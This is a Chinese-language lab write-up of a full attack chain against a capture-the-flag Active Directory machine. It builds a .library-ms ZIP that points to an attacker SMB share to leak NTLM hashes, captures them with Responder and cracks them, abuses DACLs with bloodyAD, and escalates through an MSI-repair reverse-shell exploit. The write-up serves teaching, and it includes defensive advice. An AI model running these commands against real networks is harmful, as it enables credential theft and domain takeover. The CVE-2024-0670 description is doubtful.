域渗透与BloodHound利用实战教学<\/h1>

概述<\/h2>
本教学文档详细记录了从信息收集到域渗透完成的完整过程，重点演示了BloodHound在域环境渗透中的实际应用。<\/p>

环境信息<\/h2>

目标IP：10.10.11.93<\/li>
域名：nanocorp.htb<\/li>
域控制器：DC01.nanocorp.htb<\/li>

操作系统：Microsoft Windows Server 2022<\/li> <\/ul>

第一阶段：信息收集<\/h2>

端口扫描<\/h3>

使用Nmap进行全端口扫描，识别开放服务：<\/p>

sudo nmap -O -A -Pn -T3 -p- 10.10.11.93
<\/span><\/span><\/code><\/pre>关键发现：<\/strong><\/p>

53\/tcp：DNS服务<\/li>
80\/tcp：HTTP服务（Apache\/2.4.58，重定向到nanocorp.htb）<\/li>
88\/tcp：Kerberos认证<\/li>
135\/tcp：RPC服务<\/li>
139\/445\/tcp：SMB服务<\/li>
389\/636\/tcp：LDAP服务（域：nanocorp.htb）<\/li>
5986\/tcp：WinRM服务（HTTPS）<\/li>
<\/ul>
Web应用分析<\/h3>

目录扫描未发现明显漏洞<\/li>
发现"关于我们"页面存在文件上传功能<\/li>
上传后文件自动解压，存在安全风险<\/li>
<\/ol>
第二阶段：漏洞利用<\/h2>
CVE-2025-24071利用<\/h3>
利用Windows资源管理器处理.library-ms文件的漏洞触发SMB身份验证泄漏。<\/p>
攻击步骤：<\/strong><\/p>

生成恶意ZIP文件<\/strong><\/li>
<\/ol>
python3 poc.py
<\/span><\/span>Enter your file name: exp
<\/span><\/span>Enter IP (<\/span>EX: 192.168.1.162)<\/span>: 10.10.16.69
<\/span><\/span><\/code><\/pre>
ZIP文件内容分析<\/strong><\/li>
<\/ol>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><libraryDescription<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/windows\/2009\/library"<\/span>><\/span>
<\/span><\/span>  <searchConnectorDescriptionList><\/span>
<\/span><\/span>    <searchConnectorDescription><\/span>
<\/span><\/span>      <simpleLocation><\/span>
<\/span><\/span>        <url><\/span>\\10.10.16.69\shared<\/url><\/span>
<\/span><\/span>      <\/simpleLocation><\/span>
<\/span><\/span>    <\/searchConnectorDescription><\/span>
<\/span><\/span>  <\/searchConnectorDescriptionList><\/span>
<\/span><\/span><\/libraryDescription><\/span>
<\/span><\/span><\/code><\/pre>
启动Responder监听<\/strong><\/li>
<\/ol>
sudo python3 Responder.py -I tun0 -v
<\/span><\/span><\/code><\/pre>
上传恶意文件触发哈希泄漏<\/strong>

成功获取web_svc用户的NTLMv2哈希：<\/li>
<\/ol>
web_svc::NANOCORP:cee11bd7e702b1e2:A01391B16E1E85E7A4CEA2DC2D26FF14:...
<\/code><\/pre>
密码破解<\/h3>
使用Hashcat破解NTLMv2哈希：<\/p>
hashcat -m 5600<\/span> hash.txt rockyou.txt
<\/span><\/span><\/code><\/pre>破解结果：<\/strong><\/p>

用户名：web_svc<\/li>
密码：dksehdgh712!@#<\/li>
<\/ul>
凭证验证<\/h3>
通过SMB验证凭证有效性：<\/p>
smbclient -L \/\/10.10.11.93 -U 'NANOCORP\/web_svc%dksehdgh712!@#'<\/span>
<\/span><\/span><\/code><\/pre>第三阶段：BloodHound分析<\/h2>
环境配置<\/h3>

解决Kerberos时间同步问题<\/strong><\/li>
<\/ol>
sudo ntpdate 10.10.11.93
<\/span><\/span><\/code><\/pre>
生成Kerberos配置文件<\/strong><\/li>
<\/ol>
nxc smb 10.10.11.93 -u 'web_svc'<\/span> -p 'dksehdgh712!@#'<\/span> --generate-krb5-file krb5.conf
<\/span><\/span>export KRB5_CONFIG=<\/span>\/home\/ubuntu\/krb5.conf
<\/span><\/span><\/code><\/pre>数据收集<\/h3>
使用bloodhound-python收集域信息：<\/p>
sudo ntpdate nanocorp.htb &&<\/span> bloodhound-python -c All -d nanocorp.htb -u 'web_svc'<\/span> -p 'dksehdgh712!@#'<\/span> -ns 10.10.11.93 --zip
<\/span><\/span><\/code><\/pre>收集到的信息：<\/strong><\/p>

1个域控制器<\/li>
6个用户账户<\/li>
53个安全组<\/li>
2个组策略对象<\/li>
2个组织单位<\/li>
<\/ul>
攻击路径分析<\/h3>
通过BloodHound发现关键攻击路径：<\/p>
三步DACL滥用路径：<\/strong><\/p>

AddSelf权限滥用<\/strong>：web_svc用户可主动加入特定组<\/li>
ForceChangePassword权限<\/strong>：加入特定组后获得对moniioring_svc的密码修改权限<\/li>
远程管理权限<\/strong>：moniioring_svc具有远程管理组权限<\/li>
<\/ol>
第四阶段：权限提升<\/h2>
实施攻击路径<\/h3>

使用bloodyAD添加用户到目标组<\/strong><\/li>
<\/ol>
bloodyAD -d nanocorp.htb -u 'web_svc'<\/span> -p 'dksehdgh712!@#'<\/span> addGroupMember '目标组名'<\/span> 'web_svc'<\/span>
<\/span><\/span><\/code><\/pre>
强制修改moniioring_svc密码<\/strong><\/li>
<\/ol>
bloodyAD -d nanocorp.htb -u 'web_svc'<\/span> -p 'dksehdgh712!@#'<\/span> setPassword 'moniioring_svc'<\/span> '新密码'<\/span>
<\/span><\/span><\/code><\/pre>
通过WinRM连接<\/strong><\/li>
<\/ol>
evil-winrm -i 10.10.11.93 -u 'moniioring_svc'<\/span> -p '新密码'<\/span>
<\/span><\/span><\/code><\/pre>特权提升（CVE-2024-0670）<\/h3>
漏洞背景：<\/strong><\/p>

Windows Installer服务中的竞争条件和逻辑缺陷<\/li>
允许本地权限提升<\/li>
<\/ul>
利用步骤：<\/strong><\/p>


识别MSI修复触发器<\/strong>

在注册表中查找相关的MSI安装包<\/p>
<\/li>

创建利用脚本（exploit.ps1）<\/strong><\/p>
<\/li>
<\/ol>
# 利用脚本内容<\/span>
<\/span><\/span># 包含MSI修复触发和反向shell建立<\/span>
<\/span><\/span><\/code><\/pre>
上传必要工具<\/strong><\/li>
<\/ol>

nc.exe（Netcat）<\/li>
exploit.ps1（利用脚本）<\/li>
<\/ul>

执行攻击<\/strong><\/li>
<\/ol>
PS C:\Temp> .\exploit.ps1
<\/span><\/span><\/code><\/pre>
触发MSI修复<\/strong><\/li>
<\/ol>
msiexec.exe \/fa C:\Windows\Installer\1e6f2.msi \/qn
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>
技术要点<\/h3>

NTLM中继攻击<\/strong>：通过文件上传功能触发SMB认证请求<\/li>
BloodHound路径分析<\/strong>：识别域内特权提升路径<\/li>
DACL滥用<\/strong>：利用Active Directory中的权限配置缺陷<\/li>
Windows服务漏洞<\/strong>：MSI安装服务的权限提升漏洞<\/li>
<\/ol>
防御建议<\/h3>

限制文件上传功能<\/strong>：对上传文件类型进行严格限制<\/li>
监控SMB流量<\/strong>：检测异常的SMB认证请求<\/li>
定期审计权限<\/strong>：检查域内用户的权限分配<\/li>
及时安装补丁<\/strong>：修复已知的Windows漏洞<\/li>
<\/ol>
工具列表<\/h3>

Nmap：端口扫描和服务识别<\/li>
Responder：LLMNR\/NBT-NS毒化攻击<\/li>
Hashcat：密码哈希破解<\/li>
BloodHound：Active Directory权限分析<\/li>
bloodyAD：Active Directory操作工具<\/li>
Evil-WinRM：Windows远程管理<\/li>
<\/ul>
本教学文档完整展示了从外部侦察到域内权限提升的完整攻击链，强调了BloodHound在域渗透中的关键作用。<\/p>

域渗透与BloodHound利用实战教学<\/h1>

概述<\/h2> 本教学文档详细记录了从信息收集到域渗透完成的完整过程，重点演示了BloodHound在域环境渗透中的实际应用。<\/p>

第一阶段：信息收集<\/h2>

第二阶段：漏洞利用<\/h2>

第三阶段：BloodHound分析<\/h2>

第四阶段：权限提升<\/h2>

关键知识点总结<\/h2>

概述<\/h2>
本教学文档详细记录了从信息收集到域渗透完成的完整过程，重点演示了BloodHound在域环境渗透中的实际应用。<\/p>